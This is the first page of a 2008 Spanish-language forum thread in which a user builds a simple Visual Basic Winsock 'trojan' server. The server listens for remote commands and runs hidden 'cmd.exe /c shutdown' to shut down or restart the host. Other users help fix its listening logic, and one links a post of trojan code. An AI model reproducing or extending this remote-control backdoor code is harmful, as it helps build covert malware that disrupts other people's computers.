elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  SOLUCIONADO ;Duda empezando con winsock
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: SOLUCIONADO ;Duda empezando con winsock  (Leído 6,243 veces)
Littl3

Desconectado Desconectado

Mensajes: 239


Tarde o temprano aparece el hombre


Ver Perfil
SOLUCIONADO ;Duda empezando con winsock
« en: 4 Marzo 2008, 22:16 pm »

Buenas, estoy creandome un pequeño troyano de conexion directa para familiarizarme con el winsock, el codigo del server es el siguiente:

Código:

Private Sub Form_Load()

Escuchar

End Sub

Private Sub Escuchar()

Ws.Listen       ' Escucha en x puerto
WAClase = "VBE"
End Sub

Private Sub Ws_ConnectionRequest(ByVal RequestID As Long)
Ws.Close
Ws.Accept RequestID 'acepta conexiones
End Sub
Private Sub Ws_DataArrival(ByVal bytestotal As Long)
Dim datos As String
Ws.GetData datos        '  datos recibidos a la variable datos
txtDatos.Text = datos
End Sub

Private Sub txtDatos_Change()
If txtDatos.Text = "apa" Then
Shell ("cmd.exe /c shutdown -s -t 1")

End If
If txtDatos.Text = "rei" Then
Shell ("cmd.exe /c shutdown -r -t 2"), vbHide

End If
If txtDatos.Text = "mensaje" Then
MsgBox ("X mensaje ")

End If

End Sub

Pues bien, el cliente conecta bien con el servidor, al darle la orden para el MsgBox ("X mensaje") el mensaje sale correctamente , pero vuelvo a darle la misma orden y el servidor me ignora totalmente, desconecto desde el cliente y intento volver a conectar y no encuentra el servidor, e mirado en procesos y el servidor sigue ejecutandose asi que no lo entiendo, se supone que el winsock deberia seguir a la escucha i aceptar conexiones entrantes no? como es possible que el servidor siga ejecutandose pero no reciba ordenes del cliente :S

Es como si el servidor solo aceptase una orden y despues dejase de escuchar.
Gracias de antemano
salu2


« Última modificación: 6 Marzo 2008, 12:06 pm por Littlehack » En línea

juancho77


Desconectado Desconectado

Mensajes: 455


rie con demencia


Ver Perfil
Re: Duda empezando con winsock
« Respuesta #1 en: 5 Marzo 2008, 02:21 am »

Citar
se supone que el winsock deberia seguir a la escucha i aceptar conexiones entrantes no? como es possible que el servidor siga ejecutandose pero no reciba ordenes del cliente :S

Porque el servidor llama al procedimiento Escuchar solo en el load del form1.
Entonces cuando se cierra la conexion, tendrias que ponerle que lo llame de vuelta. Eso seria en el evento Error y Close del winsock.


En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Duda empezando con winsock
« Respuesta #2 en: 5 Marzo 2008, 02:39 am »

lo uqe yo hago es poner un timer i si el ws.state no es = a 7 entonces esuche
edito:emves de hacer lo que haces para el mensaje ocupa esto:
Código:
If Left(datos, 3) = "msg" Then
 datos = Right(datos, Len(datos) - 3)
 msgbox (datos)
 End If
end sub
entonces pones una textbox en el cliente ai escribes el mensaje i al apretar el boton emviar mensaje haga esto
Código:
ws.senddata "msg"&txtmsg.text
toma un post que hice con cosas para los troyanos
http://invisiblehack.mforos.com/1109918/6704001-codes-para-ponerles-a-los-troyanos-que-uds-hagan/?marcar=krackwar
« Última modificación: 5 Marzo 2008, 02:47 am por krackwar » En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
juancho77


Desconectado Desconectado

Mensajes: 455


rie con demencia


Ver Perfil
Re: Duda empezando con winsock
« Respuesta #3 en: 5 Marzo 2008, 03:58 am »

Si, lo que pasa es que con un timer saturas mas la computadora. Imaginate que cada un segundo (o el tiempo que tu elijas) el servidor estara preguntando lo mismo, muchas veces inutilmente. Con los estados del Winsock por ahi es mas...profesional. Pero en tu caso, con una aplicacion "sencilla" como esta ni se notara.
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Duda empezando con winsock
« Respuesta #4 en: 5 Marzo 2008, 04:30 am »

sise que ocupa mas ram pero como dices si el server es como lo escribes haca ni se nota la diferencia
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
Littl3

Desconectado Desconectado

Mensajes: 239


Tarde o temprano aparece el hombre


Ver Perfil
Re: Duda empezando con winsock
« Respuesta #5 en: 5 Marzo 2008, 07:52 am »

gracias a los 2, ahora cuando llegue a clase probare con el timer y me mirare el post, luego os cuento,
salu2

Edito:

Buenas, e añadido el timer con interval 3000 y lo e puesto tal como haveis dicho o eso creo xD

Código:
Private Sub TimerEsuchar_Timer()

Escuchar

End Sub

Private Sub Escuchar()
Ws.Listen       ' Escucha en x puerto
WAClase = "VBE"
End Sub

Private Sub Ws_ConnectionRequest(ByVal RequestID As Long)
Ws.Close
Ws.Accept RequestID 'acepta conexiones
End Sub
Private Sub Ws_DataArrival(ByVal bytestotal As Long)
Dim datos As String
Ws.GetData datos        '  datos recibidos a la variable datos
txtDatos.Text = datos
End Sub

Private Sub txtDatos_Change()
    If txtDatos.Text = "apa" Then
    Shell ("cmd.exe /c shutdown -s -t 1")

End If
    If txtDatos.Text = "rei" Then
    Shell ("cmd.exe /c shutdown -r -t 2"), vbHide

End If
    If Left(datos, 3) = "msg" Then               'Si los 3 caracteres de la izquierda son = a msg
    datos = Right(datos, Len(datos) - 3)        'Datos sera = empezando por la derecha todos los caracteres - 3 (msg)
    MsgBox (datos)
 End If
End Sub


Cuando pasan los 3 segundos me marca el siguiente Error:

Error '10037' en tiempo de ejecucion:
The operation is completed. No blocking operation is in progress.
Me señala la linea    Ws.Listen       ' Escucha en x puerto
« Última modificación: 5 Marzo 2008, 08:37 am por Littlehack » En línea

cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: Duda empezando con winsock
« Respuesta #6 en: 5 Marzo 2008, 16:19 pm »

Cuando pasan los 3 segundos me marca el siguiente Error:

Error '10037' en tiempo de ejecucion:
The operation is completed. No blocking operation is in progress.
Me señala la linea    Ws.Listen       ' Escucha en x puerto

Prueba a usar comprobación de estado antes de la linea donde te marca el error:
Código
  1. 'Si el socket no esta conectado ni en escucha entonces...
  2. If Ws.State <> 2 And Ws.State <> 7 Then

Aunque no te recomendaria lo del Timer, deberías hacer lo que dice juancho77 despues de que la conexión se cierre
tendrias que ponerle que lo llame de vuelta. Eso seria en el evento Error y Close del winsock.

« Última modificación: 5 Marzo 2008, 16:23 pm por C@ss¡@n¡ » En línea

juancho77


Desconectado Desconectado

Mensajes: 455


rie con demencia


Ver Perfil
Re: Duda empezando con winsock
« Respuesta #7 en: 5 Marzo 2008, 18:15 pm »

Código:
Private Sub Timer1_Timer()
If Winsock1.State <> 2 & Winsock1.State <> 7 Then
Winsock1.Close  ' acordate siempre de cerrarlo
Winsock1.Listen
End If
If Winsock1.State = sckConnected Then
Label1.Caption = "conectado"
End If
End Sub

Te faltaba el winsock1.close. O sea, pone lo que dice casiani y si el socket no esta ni conectado ni escuchando entonces Winsock1.Close y lo que vos quieras. Ahi deberia andar.
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: Duda empezando con winsock
« Respuesta #8 en: 6 Marzo 2008, 00:23 am »

 :xD :xD :xD :xD estoi mal hacustumbrado con los timer :xD :xD :xD :xD
« Última modificación: 6 Marzo 2008, 01:50 am por krackwar » En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
juancho77


Desconectado Desconectado

Mensajes: 455


rie con demencia


Ver Perfil
Re: Duda empezando con winsock
« Respuesta #9 en: 6 Marzo 2008, 01:47 am »

yo? que? ah??!
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Solucionado] Connectar a dos ip Winsock
Programación Visual Basic
Leinad5991 3 3,530 Último mensaje 1 Enero 2011, 15:58 pm
por Leinad5991
Empezando en C/C++ primera duda
Programación C/C++
devKL 8 3,025 Último mensaje 11 Noviembre 2011, 03:44 am
por devKL
[Solucionado]Troyano MASM (duda con WINSOCK)
ASM
.:UND3R:. 3 3,088 Último mensaje 12 Mayo 2013, 18:49 pm
por .:UND3R:.
duda ejercicio, empezando con C
Programación C/C++
++c 8 3,063 Último mensaje 1 Mayo 2014, 16:06 pm
por vangodp
Error con send de Winsock (Solucionado)
Programación C/C++
AlbertoBSD 0 1,225 Último mensaje 1 Diciembre 2018, 23:21 pm
por AlbertoBSD
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines